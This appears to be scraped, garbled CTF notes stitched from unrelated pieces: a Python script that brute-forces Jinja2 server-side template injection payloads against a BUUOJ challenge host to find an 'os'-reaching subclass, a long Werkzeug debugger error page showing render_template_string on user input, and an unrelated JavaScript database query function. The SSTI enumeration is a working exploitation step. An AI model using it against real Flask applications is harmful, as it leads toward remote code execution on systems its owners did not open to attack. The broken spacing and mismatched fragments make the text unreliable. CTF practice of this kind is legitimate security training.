import requests import re import time for i inrange(0, 100): time.sleep(0.04) url = "http://3ae9f2a4-38eb-4d14-9b46-74045fd576fb.node4.buuoj.cn:81/secr3tofpop?name={%%20print([].__class__.__base__.__subclasses__()["+str(i)+"])%20%}"
s = requests.get(url=url) time.sleep(0.06) #print(s.text) if'os'in s.text: print(i) else: continue
<li><divclass="frame"id="frame-139696630025344"> <h4>File <citeclass="filename">"<unknown>"</cite>, line <emclass="line">2</em>, in <codeclass="function">template</code></h4> <divclass="source "></div> </div> </ul> <blockquote>jinja2.exceptions.TemplateSyntaxError: tag name expected </blockquote> </div>
<divclass="plain"> <p> This is the Copy/Paste friendly version of the traceback. </p> <textareacols="50"rows="10"name="code"readonly>Traceback (most recent call last): File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 2213, in __call__ return self.wsgi_app(environ, start_response) File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 2193, in wsgi_app response = self.handle_exception(e) File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 2190, in wsgi_app response = self.full_dispatch_request() File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 1486, in full_dispatch_request rv = self.handle_user_exception(e) File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 1484, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 1469, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) File "/app/app.py", line 21, in hello return render_template_string(sign_in) File "/usr/local/lib/python3.8/site-packages/flask/templating.py", line 162, in render_template_string template = app.jinja_env.from_string(source) File "/usr/local/lib/python3.8/site-packages/jinja2/environment.py", line 1105, in from_string return cls.from_code(self, self.compile(source), gs, None) File "/usr/local/lib/python3.8/site-packages/jinja2/environment.py", line 768, in compile self.handle_exception(source=source_hint) File "/usr/local/lib/python3.8/site-packages/jinja2/environment.py", line 936, in handle_exception raise rewrite_traceback_stack(source=source) File "<unknown>", line 2, in template jinja2.exceptions.TemplateSyntaxError: tag name expected </textarea> </div> <divclass="explanation"> The debugger caught an exception in your WSGI application. You can now look at the traceback which led to the error. <spanclass="nojavascript"> If you enable JavaScript you can also use additional features such as code execution (if the evalex feature is enabled), automatic pasting of the exceptions and much more.</span> </div> <divclass="footer"> Brought to you by <strongclass="arthur">DON'T PANIC</strong>, your friendly Werkzeug powered traceback interpreter. </div> </div>
<divclass="pin-prompt"> <divclass="inner"> <h3>Console Locked</h3> <p> The console is locked and needs to be unlocked by entering the PIN. You can find the PIN printed out on the standard output of your shell that runs the server. <form> <p>PIN: <inputtype=textname=pinsize=14> <inputtype=submitname=btnvalue="Confirm Pin"> </form> </div> </div> </body> </html>
<!--
Traceback (most recent call last): File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 2213, in __call__ return self.wsgi_app(environ, start_response) File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 2193, in wsgi_app response = self.handle_exception(e) File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 2190, in wsgi_app response = self.full_dispatch_request() File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 1486, in full_dispatch_request rv = self.handle_user_exception(e) File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 1484, in full_dispatch_request rv = self.dispatch_request() File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 1469, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) File "/app/app.py", line 21, in hello return render_template_string(sign_in) File "/usr/local/lib/python3.8/site-packages/flask/templating.py", line 162, in render_template_string template = app.jinja_env.from_string(source) File "/usr/local/lib/python3.8/site-packages/jinja2/environment.py", line 1105, in from_string return cls.from_code(self, self.compile(source), gs, None) File "/usr/local/lib/python3.8/site-packages/jinja2/environment.py", line 768, in compile self.handle_exception(source=source_hint) File "/usr/local/lib/python3.8/site-packages/jinja2/environment.py", line 936, in handle_exception raise rewrite_traceback_stack(source=source) File "<unknown>", line 2, in template jinja2.exceptions.TemplateSyntaxError: tag name expected
asyncfunctiongetInfo(timestamp) {//getInfo异步函数 timestamp = typeof timestamp === "number" ? timestamp : Date.now();//检查传入的timestamp参数是否为数字类型,如果不是则将其设置为当前时间戳 // Remove test data from before the movie was released let minTimestamp = newDate(CONFIG.min_public_time || DEFAULT_CONFIG.min_public_time).getTime();//将min_public_time转换为时间戳,使用应用程序配置中的最小公开时间,如果没有配置,则使用默认配置中的最小公开时间 timestamp = Math.max(timestamp, minTimestamp);//确保timestamp不会早于minTimestamp const data = await sql.all(`SELECT wishid, date, place, contact, reason, timestamp FROM wishes WHERE timestamp >= ?`, [timestamp]).catch(e => { throw e }); return data; }